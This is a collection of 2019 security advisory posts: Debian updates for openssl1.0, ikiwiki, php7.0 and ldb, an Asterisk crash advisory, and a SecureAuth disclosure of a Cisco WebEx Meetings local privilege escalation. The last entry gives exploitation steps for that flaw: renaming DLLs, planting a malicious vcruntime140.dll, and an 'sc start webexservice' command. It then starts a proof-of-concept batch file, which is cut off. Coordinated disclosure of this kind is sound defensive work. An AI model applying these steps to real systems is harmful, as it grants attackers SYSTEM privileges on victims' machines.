[SECURITY] [DSA 4400-1] openssl1.0 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4400-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff February 28, 2019 https://www.debian.org/security/faq - - Package: openssl1.0 CVE ID : CVE-2019-1559 Juraj Somorovsky, Robert Merget and Nimrod Aviram discovered a padding oracle attack in OpenSSL. For the stable distribution (stretch), this problem has been fixed in version 1.0.2r-1~deb9u1. We recommend that you upgrade your openssl1.0 packages. For the detailed security status of openssl1.0 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl1.0 Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlx4WgkACgkQEMKTtsN8 TjZZCQ//UdQ3Bi/ZSQJ2yzW7MkbuaHla53iUhztTy2Zrype++NX4tXqqBl+xY9Eu 1D747Y1c2GZ949UaPbIvp8wLCvvxR5A4Tmx4sU3ZOOHXrlsZ5loYg66MslGUOMOU z7zaqXTg3as8wfD6ND5Zd4tP0iLyst8Vyi0W7PuFovLoPAc3/XcMaXghSwabs+JY 3KZuB4UlbOiEnO+6Mf5ghWQYBtN7y/QAVNWREfLmhpx2UY8F7Ia28bR9pXknxkl5 RuN9WH2BtXI4/JiL0TlkAua51NE+vXciPv+Dh4gkQNPWF/rfL9IL5AxjrgojysHf OhZaDcYpOPCXZmiA49JOXJOrIw73Zd9NZmgA1ZXQY1ECQDJ8dB9mSJj1KsUId+Id eTbRRbWwpzSQd5qc4h4NKjeIwA04a3JecDibD3pwf3+qn9sw8xQ/rfAl2byGRbEN FUDT65AIw4CFQDJeIE/vBZqCFhY2aIbRoibpZnp0XsROkw8xKQiH0Kgo7gjsoozT wHYK/rlvaZwbnLG7E8pUUj9Xr8OM9Wn/y7kzyHVekGUcDef3F1pPJ9CYsdppx+Zv MkoFNxc9GZ+Kn2i4l14I3hvwQ4Sy3owNjnTYFQ28yd+MRZoMw+nyXW1i7OCu+KFH 7OQkd5qNDh8iotsaUKT0DQOOL74UDgEPv2x02ahujRl+I3YDDdM= =NRWo -END PGP SIGNATURE-
[SECURITY] [DSA 4399-1] ikiwiki security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4399-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff February 28, 2019 https://www.debian.org/security/faq - - Package: ikiwiki CVE ID : CVE-2019-9187 Joey Hess discovered that the aggregate plugin of the Ikiwiki wiki compiler was susceptible to server-side request forgery, resulting in information disclosure or denial of service. For the stable distribution (stretch), this problem has been fixed in version 3.20170111.1. We recommend that you upgrade your ikiwiki packages. For the detailed security status of ikiwiki please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ikiwiki Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlx4W1sACgkQEMKTtsN8 TjYRdQ/9EpHB2hjCSWSljyDGUkjkxOF3cSa8mICgfuFirFavbrUs9a/bKZu79DG2 67a/NLI7QHqSj1Ygy1G72hUx8Ec8hq2iNEIpKSC09jy0LpkE0C5p7WRaPQ/FyvZ0 EudvmkWyodp7bGxj9fzuGFGx2mTNHKypHNSFBpmm7sFQpL+IUUV3HBg2w38d2kzu Z7+TGiBkUgZ3KlCuRZaJCvedNHTKADGUAFsLTF2EgMXC/ttWJdz3a6UAQ9eYl3td NTOOfNTAGDkqLwIiMsverQfyZ47ViLsj/1WRwr7o+vZ3etGkjCHtolZMe3PEkToy nyrEjZKnYtBrZ+SHR9ilddWj3eb9PbEc69tmU3WxBl9Pp8j+H2+9ao61qebEqRfS AG71acRbODDqnn9qTicrdLBvtmN0XShplnjec6IlGupXyW6t2R+x4Ofleswf9v+G OycSyrlmDCUYlHNQg6G0yycbyCW6RyrdDTeKMZkiY44NBmY/w2zju745POsvEKBP JDj0+toe6BDeAOl+tr9GpsgvStDBxj7g917GVfznpJIHuE2iW44TpWhxa53WsFvw M5Fsraw/1PjInns6r+43HvH1wtk/h8QVzALXl/otrd2Fc7+FTTkpTnqQqC+nYltI UOkZ92P/pW7GtvrtNuIWOknZFASgb7iY4zaDgSOpU0jy5I6Mfr0= =Oznf -END PGP SIGNATURE-
[SECURITY] [DSA 4398-1] php7.0 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4398-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff February 28, 2019 https://www.debian.org/security/faq - - Package: php7.0 CVE ID : CVE-2019-9020 CVE-2019-9021 CVE-2019-9022 CVE-2019-9023 CVE-2019-9024 Multiple security issues were found in PHP, a widely-used open source general purpose scripting language: Multiple out-of-bounds memory accesses were found in the xmlrpc, mbstring and phar extensions and the dns_get_record() function. For the stable distribution (stretch), these problems have been fixed in version 7.0.33-0+deb9u2. We recommend that you upgrade your php7.0 packages. For the detailed security status of php7.0 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/php7.0 Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlx4WgIACgkQEMKTtsN8 TjZMXQ/+OPjr90meyXOol5+cpyBgoTNAMilfIgmadI6cKjZp9SEeDUYsbwmufSD0 Ijj5MACGM2o8D4IOybibE1xYNKe7IFajyCi51Mq/KCEYRIsIRjL8Uc2IuIu7+u4e nOz3C4PDV+MjBvapzFARtwa04IPsiicT71DrBFjOEbISgRBkzhlFdTQfIGen8WWK sDb+iGDGMyFn4CGiHJixlFjYjkUmQ2sD8SH8/+UGN4uRJ4I4dlcL5C8xA8qb6pQi HWigJ9nXpKjLsONPf7wLsJ1zTTo5LzrxEHfA1bt79SxBgtCvrTut/n1YDrTOtqzO EDZ1SWSBZJ8pbBHCBwGZymu+km8QiK6jALXxgWj4Exrq3IXW3pJFrY5CSiDAGL1i OU6aJEJe5XbG6cbUq2o1MKTZz28zO1zsVnpnCjyE8+Rqar9WtTWEG8MX/VXY28iv aHK5BOpL8KutqDyN0R2pgKjbL/M0xb0iTHYywvx54GSEZU9D3ZbpFJdChTk1pj3q mKzAUdw2C/oriuAzmdK070qNVtMTe+1bXuxXDroRNWJ4mpInUcmIgIwS+DKN7/1F Jbnl0/UvNfEVsv4UuUSwvZWnE7ufRYQrnH6IAjcpjfCy37WEq7gMEPNZ/LiM3BeV 2cXq0eMgmv/CYE1gvv1ZZGOaqeKXoK8pN0bziFGqpNQKboCi+uk= =02HS -END PGP SIGNATURE-
AST-2019-001: Remote crash vulnerability with SDP protocol violation
Asterisk Project Security Advisory - AST-2019-001 ProductAsterisk SummaryRemote crash vulnerability with SDP protocol violation Nature of Advisory Denial Of Service SusceptibilityRemote Authenticated Sessions Severity Low Exploits KnownNo Reported On January 24, 2019 Reported By Sotiris Ganouris Posted On November 14,2018 Last Updated On Advisory Contact gjoseph AT digium DOT com CVE Name CVE-2019-7251 Description When Asterisk makes an outgoing call, a very specific SDP protocol violation by the remote party can cause Asterisk to crash. Resolution Upgrade Asterisk to a fixed version. Affected Versions Product Release Series Asterisk Open Source 15.xAll releases Asterisk Open Source 16.xAll releases Corrected In Product Release Asterisk Open Source15.7.2 Asterisk Open Source16.2.1 Patches SVN URL Revision http://downloads.asterisk.org/pub/security/AST-2019-001-15.diff Asterisk 15 http://downloads.asterisk.org/pub/security/AST-2019-001-16.diff Asterisk 16 Links https://issues.asterisk.org/jira/browse/ASTERISK-28260 Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2019-001.pdf and http://downloads.digium.com/pub/security/AST-2019-001.html Revision History Date Editor Revisions Made January 31, 2019 George Joseph Initial revision Asterisk Project Security Advisory - AST-2019-001 Copyright (c) 2018 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.
[SECURITY] [DSA 4397-1] ldb security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4397-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso February 28, 2019 https://www.debian.org/security/faq - - Package: ldb CVE ID : CVE-2019-3824 Garming Sam reported an out-of-bounds read in the ldb_wildcard_compare() function of ldb, a LDAP-like embedded database, resulting in denial of service. For the stable distribution (stretch), this problem has been fixed in version 2:1.1.27-1+deb9u1. We recommend that you upgrade your ldb packages. For the detailed security status of ldb please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ldb Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlx4OBpfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0R1oA//YuTxQ4iQkHgqW12SWdWMdFZC2rFuHBWI+u7pOUYNkkI3CiPwvjTrKFkn K2E6ASlB2vmoJfoTqTDzCgssOT55JKQsD8a7ocfq9tloSSbz4RUEgqNS93Yqc4Er +eUhTe2491qNGkshyuIENSoYR7cO/FMpUqRWdXH0W65nx9tD/D1Q2mCCVQwXNfQz 2jlRCvaSklOL9hyt/ibnhce23LuM1t50W/eicG3XAcjp4WGx735uq9KqjfcyJ1QT voL4qoJJxizi04M6oA5z2iUR/qKIW25qTHzj6b+uk/MJX+Rj+3j3nz5prvx5nn4t EGq537Yvhg5YYMbTSfThPOu/jgfMe/sUx3q8/2wkGs76enwFZ0eQTKvMi8Fo4fOs kRJrz6HXQJeCuv8T1NDBPMekebQw9bzdo9DyHukF+0w69LBGxySW5q7qG+NDmN19 zKbP9t/GH0BUQbq1B7x67W20i0EXHNk36GVSMjI17ksbJptVpok86wamNeoSpKgy nLf70RZ45W+XEBMyV11NdU7kusgHh3Fj3owrGsLhIM07noao1hSYVHLVqscufdbw 9zofA1ALjCiFyYeJmzGfEGh60U+ibfc3w9EUbfi31kGXZMDmeZ8+p3fWohxjlijg 2RspyOq1AX/t1ql3WWuBOBJctlUjNMVkiLgaDmspingEDV93UlI= =VZSx -END PGP SIGNATURE-
[CORE-2018-0012] - Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2 1. *Advisory Information* Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2 Advisory ID: CORE-2018-0012 Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability-version-2 Date published: 2019-02-27 Date of last update: 2019-02-27 Vendors contacted: Cisco Release mode: Coordinated release 2. *Vulnerability Information* Class: OS command injection [CWE-78] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2019-1674 3. *Vulnerability Description* Cisco's Webex Meetings website states that [1]: Cisco Webex Meetings: Simply the Best Video Conferencing and Online Meetings. With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters. A vulnerability in the update service of Cisco Webex Meetings Desktop App for Windows could allow a local attacker to elevate privileges. 4. *Vulnerable Packages* . Cisco Webex Meetings Desktop App v33.6.4.15 . Cisco Webex Meetings Desktop App v33.6.5.2 . Cisco Webex Meetings Desktop App v33.7.0.694 . Cisco Webex Meetings Desktop App v33.7.1.15 . Cisco Webex Meetings Desktop App v33.7.2.24 . Cisco Webex Meetings Desktop App v33.7.3.7 . Cisco Webex Meetings Desktop App v33.8.0.779 . Cisco Webex Meetings Desktop App v33.8.1.13 . Cisco Webex Meetings Desktop App v33.8.2.7 . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* Cisco informed that released the vulnerability is fixed in Cisco Webex Meetings Desktop App releases 33.6.6 and 33.9.1. In addition, Cisco published the following advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj 6. *Credits* This vulnerability was discovered and researched by Marcos Accossatto from SecureAuth. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Privilege Escalation* [CVE-2019-1674] The update service of Cisco Webex Meetings Desktop App for Windows does not properly validate version numbers of new files. An unprivileged local attacker could exploit this vulnerability by invoking the update service command with a crafted argument and folder. This will allow the attacker to run arbitrary commands with SYSTEM user privileges. The vulnerability can be exploited by copying to a local attacker controller folder, the atgpcdec.dll binary and rename it as atgpcdec.7z. Then, a previous version of the ptUpdate.exe file must be compressed as 7z and copied to the controller folder. Also, a malicious dll must be placed in the same folder, named vcruntime140.dll and compressed as vcruntime140.7z. Finally, a ptUpdate.xml file must be provided in the controller folder for the update binary (ptUpdate.exe) to treat our files as a normal update. To gain privileges, the attacker must start the service with the command line: sc start webexservice WebexService 1 989898 "attacker-controlled-path" Proof of Concept: The following proof of concept performs a 2 step attack, since starting from version 33.8.X, the application enforces the checking of signatures for all the downloaded binaries. This 2 step attack works against all the mentioned vulnerable packages. Notice that you'll need the previous versions of the ptUpdate.exe executable. Those versions are: 3307.1.1811.1500 for the first step and 3306.4.1811.1600 for the last step. To exploit version priot to 33.8.X, only one step is required (the last step in this PoC). Batch file: /- @echo off REM Contents of PoC.bat REM REM This batch file will exploit CVE-2019-1674 REM REM First, it will copy the atgpcdec.dll file from the installation REM folder to the current folder as atgpcdec.7z. Then, it will backup REM ptUpdate.exe and vcruntime140.dll files from the installation folder REM in the current folder, adding .bak to their names. Keep in mind that REM those files will be replaced (especially, vcruntime140.dll) and if REM not restored, will render the application useless. REM REM The executable ptUpdate.exe version 3307.1.1811.1500 must be REM compressed as ptUpdate0.7z and present in the current folder. REM The executable ptUpdate.exe version 3306.4.1811.1600 must be REM compressed as ptUpdate1.7z and present in the current folder. REM Both can be generated using 7zip GUI and compressing as 7z, with REM normal compression level and LZMA compression method. REM Another way is to compress both files using the command line app: REM REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21 REM REM ptUpdate0.xml file will be used in the first stage of the attack. It REM